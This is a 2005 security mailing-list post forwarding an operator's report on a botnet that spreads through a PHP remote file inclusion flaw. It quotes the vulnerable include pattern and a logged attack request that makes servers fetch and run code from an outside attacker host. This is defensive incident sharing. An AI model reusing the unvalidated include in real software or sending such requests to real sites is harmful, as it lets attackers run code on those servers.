[Dshield] [Fwd: Re:Destructive botnet originating from Japan]

Chris Brenton cbrenton at chrisbrenton.org
Sat Dec 24 10:46:34 GMT 2005


And the follow up that includes the point of infection. This was covered
in the diary a few days ago.


Chris

-------- Forwarded Message --------
> From: Barrett G. Lyon <blyon at prolexic.com>
> To: nanog at merit.edu
> Subject: Re:Destructive botnet originating from Japan
> Date: Fri, 23 Dec 2005 16:20:00 -0800
> 
> Well it appears that bad code always seems to be the root of  
> problems, according to our research today the problem appears to be  
> caused by incorrectly written PHP applications that perform includes  
> using a string without running any validation against the string:
> 
> index.php?test=test
> $test=$_GET[test];
> include("$test.php");
> 
> When the include executes the test string passed from the GET  
> includes execution instructions:
> 
>        "GET /index.php?test=http%3A//210.170.60.2/....? HTTP/1.0" 200  
> 8010 "-" "Wget/1.6"
> 
> It appears that the attacker at 210.170.60.2 (also the botnet hosting  
> IRC server) is spreading his code as the include is called, pulling  
> and executing PHP code from a remote server that injects the software.
> 
> I'm not sure if this needs to be alerted to anyone outside of this  
> list, but it's pretty nasty.
> 
> 
> -Barrett
> 
> 
> 
> 
> 



More information about the list mailing list